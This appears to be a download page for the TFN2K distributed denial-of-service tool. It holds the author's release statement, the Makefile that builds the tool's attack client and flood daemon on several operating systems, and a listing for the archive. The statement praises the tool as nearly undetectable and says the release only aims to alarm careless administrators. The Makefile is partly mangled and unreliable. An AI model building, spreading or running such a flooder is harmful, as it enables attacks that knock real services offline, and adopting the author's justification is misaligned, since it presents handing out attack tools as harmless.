TFN can be seen as the yet most functional DoS attack tool with the best
performance that is now almost impossible to detect. What is my point in
releasing this? Let me assure you it isn't to harm people or companies. It
is, however, to scare the heck out of everyone who does not care about
systematically securing his system, because tools sophisticated as this one
are out, currently being improved drastically, kept PRIVATE, and some of them
not with the somewhat predictable functionality of Denial Of Service. It is
time for everyone to wake up, and realize the worst scenario that could happen
to him if he does not care enough about security issues.
Therefore, this program is also designed to compile on a maximum number of
various operating systems, to show that almost no modern operating system is
specifically secure, including Windows, Solaris, most UNIX flavors and Linux.
# Tribe FloodNet - 2k edition
# by Mixter <>
# Generic Makefile
# Linux / *BSD* / Others
CC = gcc
CFLAGS = -Wall -O3
# Solaris (IRIX / AIX / HPUX ?)
#CC = gcc
#CFLAGS = -Wall -O3
#CLIBS = -lnsl -lsocket
# Win32 (cygwin)
#CC = gcc
SERVER_OBJ = pass.o aes.o base64.o cast.o flood.o ip.o process.o tribe.o td.o
CLIENT_OBJ = pass.o aes.o base64.o cast.o ip.o tribe.o tfn.o
all: td tfn
@echo removing junk...
@rm -f tfn td mkpass disc pass.c *.exe *.o *~
tfn: agreed ${CLIENT_OBJ}
${CC} ${CFLAGS} ${CLIBS} ${CLIENT_OBJ} -o tfn
strip tfn
td: agreed ${SERVER_OBJ}
${CC} ${CFLAGS} ${CLIBS} ${SERVER_OBJ} -o td
strip td
agreed: disc
pass.c: mkpass
@echo ...not love\!
文件: |
tfn2k.zip |
大小: |
26KB |
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